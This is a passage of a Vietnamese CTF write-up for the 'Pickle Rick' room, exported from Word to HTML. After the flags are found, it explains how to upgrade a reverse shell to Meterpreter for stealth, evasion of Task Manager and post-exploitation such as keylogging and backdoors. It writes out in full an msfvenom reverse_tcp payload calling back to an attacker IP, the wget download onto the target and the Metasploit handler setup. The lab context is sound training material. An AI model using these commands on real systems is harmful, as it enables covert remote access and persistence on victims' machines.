này xem nh&#432; &#273;ã n&#7855;m &#273;&#432;&#7907;c toàn b&#7897; Server,
do &#273;ó nên &#273;i vòng vòng ki&#7871;m flag cho th&#7917; thách th&#7913;
3 thui, k&#7871;t qu&#7843; nh&#7853;n &#273;&#432;&#7907;c s&#7869; là:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_28"
o:spid="_x0000_i1029" type="#_x0000_t75" alt="Graphical user interface, text&#10;&#10;Description automatically generated"
style='width:330pt;height:153pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image050.png" o:title="Graphical user interface, text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=440 height=204
src="Khai%20thác%20Pickle%20Rick%20_files/image051.png"
alt="Graphical user interface, text&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_28"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoListParagraph style='text-align:justify;text-indent:-.25in;
mso-list:l0 level1 lfo6'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Wingdings;mso-fareast-font-family:Wingdings;
mso-bidi-font-family:Wingdings'><span style='mso-list:Ignore'>ð<span
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>Gi&#7843;i &#273;&#432;&#7907;c toàn b&#7897; flag c&#7911;a
Pickle Rick<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:red'>--------------------------------------------------------------------------------------------------------------------------------------------&#272;ÂY
LÀ PH&#7846;N KI&#7870;N TH&#7912;C LIÊN QUAN NH&#431;NG NÂNG CAO
H&#416;N------------<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:red'>---------------------------------------------------------------------------------------------------------------------<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Trong
CTF, sau khi hoàn thành ph&#7847;n 3 bên trên là &#273;ã có th&#7875; coi
nh&#432; &#273;ã chi&#7871;n th&#7855;ng. Nh&#432;ng khi &#273;i làm pentest, s&#7869;
có khác bi&#7879;t m&#7897;t tí. Khác bi&#7879;t &#273;ó n&#7857;m &#7903; ch&#7895;
k&#7871;t n&#7889;i TCP reverse shell &#273;ang dùng v&#7851;n ch&#432;a ph&#7843;i
là m&#7897;t k&#7871;t n&#7889;i b&#7873;n v&#7919;ng và có th&#7875; b&#7883;
can thi&#7879;p b&#7845;t c&#7913; lúc nào do k&#7871;t n&#7889;i trên có th&#7875;
b&#7883; phát hi&#7879;n b&#7903;i Task Manager. Ch&#432;a k&#7875;
&#273;&#432;&#7901;ng truy&#7873;n TCP reverse shell không &#273;&#432;&#7907;c
mã hóa, d&#7877; d&#7851;n &#273;&#7871;n tình tr&#7841;ng l&#7897; thông tin
nh&#7841;y c&#7843;m c&#7911;a c&#7843; pentester l&#7851;n n&#7841;n nhân.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;&#7875;
phòng tránh vi&#7879;c &#273;ó, chúng ta s&#7869; nâng c&#7845;p &#273;&#432;&#7901;ng
truy&#7873;n t&#7915; TCP reverse shell thành Meterpreter shell. &#431;u
&#273;i&#7875;m c&#7911;a Meterpreter shell so v&#7899;i TCP reverse shell
nh&#432; sau:<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Meterpreter s&#7917;
d&#7909;ng in-memory DLL injection, ngh&#297;a là nó s&#7869; ch&#7881; ghi d&#7919;
li&#7879;u trên RAM mà thôi, và không ghi gì vào &#7893; c&#7913;ng c&#7843;,
do &#273;ó h&#7841;n ch&#7871; vi&#7879;c &#273;&#7875; l&#7841;i d&#7845;u v&#7871;t.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>K&#7871;t n&#7889;i
meterpreter không t&#7841;o ra process m&#7899;i mà s&#7869; t&#7921; inject nó
vào process &#273;ã b&#7883; t&#7845;n công khi&#7871;n nó g&#7847;n nh&#432;
vô hình tr&#432;&#7899;c các ch&#432;&#417;ng trình nh&#432; Task Manager trên
Windows. Khi process b&#7883; meterpreter t&#7845;n công b&#7883; kill,
meterpreter s&#7869; t&#7921; &#273;&#7897;ng nh&#7843;y sang m&#7897;t process
khác &#273;&#7875; duy trì k&#7871;t n&#7889;i.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>K&#7871;t n&#7889;i
meterpreter &#273;&#432;&#7907;c mã hóa.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
meterpreter là m&#7897;t tính n&#259;ng c&#7911;a Metasploit, s&#7917; d&#7909;ng
meterpreter cho phép pentester s&#7917; d&#7909;ng luôn các module post-exploitation
ví d&#7909; nh&#432; keyblogger, c&#7893;ng h&#7853;u, v.v. có s&#7861;n trên
Metasploit &#273;&#7875; t&#7845;n công sâu h&#417;n vào h&#7879; th&#7889;ng c&#7911;a
n&#7841;n nhân.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chúng
ta s&#7869; b&#7855;t &#273;&#7847;u nâng c&#7845;p &#273;&#432;&#7901;ng truy&#7873;n
t&#7915; TCP reverse shell thành Meterpreter shell.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>S&#7917;
d&#7909;ng câu l&#7879;nh sau &#273;&#7875; t&#7841;o ra m&#7897;t file meterpreter<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><b><i><span style='font-size:
13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>msfvenom
-p linux/x86/meterpreter/reverse_tcp LHOST=10.4.43.108 LPORT=9999 -f elf -o
shell.elf<o:p></o:p></span></i></b></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Trong
&#273;ó:<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>msfvenom:</span></b><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'> Tên câu l&#7879;nh<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-<b>p
linux/x86/meterpreter/reverse_tcp:</b> D&#7841;ng payload hay d&#7841;ng k&#7871;t
n&#7889;i s&#7869; s&#7917; d&#7909;ng<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>LHOST và
LPORT:</span></b><span style='font-size:13.0pt;line-height:107%;font-family:
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
major-latin;mso-bidi-theme-font:major-latin'> &#272;&#7883;a ch&#7881; IP và
port dùng &#273;&#7875; nh&#7853;n shell trên máy Kali c&#7911;a hacker<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-f:</span></b><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'> Format c&#7911;a d&#7919; li&#7879;u &#273;&#7847;u ra. &#7902;
&#273;ây ch&#7885;n elf là extension file th&#7921;c thi c&#7911;a Linux.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-o:</span></b><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'> Xu&#7845;t ra file có tên là shell.elf<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ti&#7871;p
theo s&#7917; d&#7909;ng câu l&#7879;nh<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><b><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>Python3 -m http.server 8000<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Câu
l&#7879;nh trên s&#7917; d&#7909;ng m&#7897;t module c&#7911;a Python có tên là
SimpleHTTPServer &#273;&#7875; bi&#7871;n directory hi&#7879;n t&#7841;i thành
m&#7897;t webserver cho phép trao &#273;&#7893;i file t&#7841;i port 8000 v&#7899;i
&#273;&#7883;a ch&#7881; IP là IP c&#7911;a hacker. Webserver này có th&#7875;
&#273;&#432;&#7907;c truy c&#7853;p b&#7903;i t&#7845;t c&#7843; các máy &#7903;
trong cùng m&#7841;ng.<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_30"
o:spid="_x0000_i1028" type="#_x0000_t75" alt="Graphical user interface, text, application&#10;&#10;Description automatically generated"
style='width:415.8pt;height:1in;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image052.png" o:title="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=554 height=96
src="Khai%20thác%20Pickle%20Rick%20_files/image052.png"
alt="Graphical user interface, text, application&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_30"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>S&#7917;
d&#7909;ng câu l&#7879;nh sau trên server &#273;&#7875; download<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><b><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>wget http://10.4.43.108:8000/shell.elf<o:p></o:p></span></b></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_31"
o:spid="_x0000_i1027" type="#_x0000_t75" alt="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"
style='width:418.8pt;height:166.2pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image053.png" o:title="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=558 height=222
src="Khai%20thác%20Pickle%20Rick%20_files/image054.png"
alt="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"
v:shapes="Picture_x0020_31"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Th&#7921;c
hi&#7879;n c&#7845;p quy&#7873;n th&#7921;c thi trên máy Server và excute file
&#273;ó<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_32"
o:spid="_x0000_i1026" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:141.6pt;height:45pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image055.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=189 height=60
src="Khai%20thác%20Pickle%20Rick%20_files/image055.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_32"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Quay
l&#7841;i trên máy kali, ti&#7871;n hành dùng metasploit &#273;&#7875; nh&#7853;n
k&#7871;t n&#7889;i tr&#7887; v&#7873;<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>msfconsole<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>use
exploit/multi/handler<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>set
LHOST &lt;IP c&#7911;a b&#7841;n&gt;<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>set
LPORT &lt;Port &#273;ã dùng trong command msfvenom bên trên&gt;<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>set
PAYLOAD linux/x86/meterpreter/reverse_tcp<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>exploit<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>K&#7871;t
qu&#7843; cu&#7889;i cùng nh&#7853;n &#273;&#432;&#7907;c s&#7869;<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_33" o:spid="_x0000_i1025"
type="#_x0000_t75" alt="Graphical user interface, text&#10;&#10;Description automatically generated"
style='width:468.6pt;height:84pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image056.png" o:title="Graphical user interface, text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=625 height=112
src="Khai%20thác%20Pickle%20Rick%20_files/image057.png"
alt="Graphical user interface, text&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_33"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink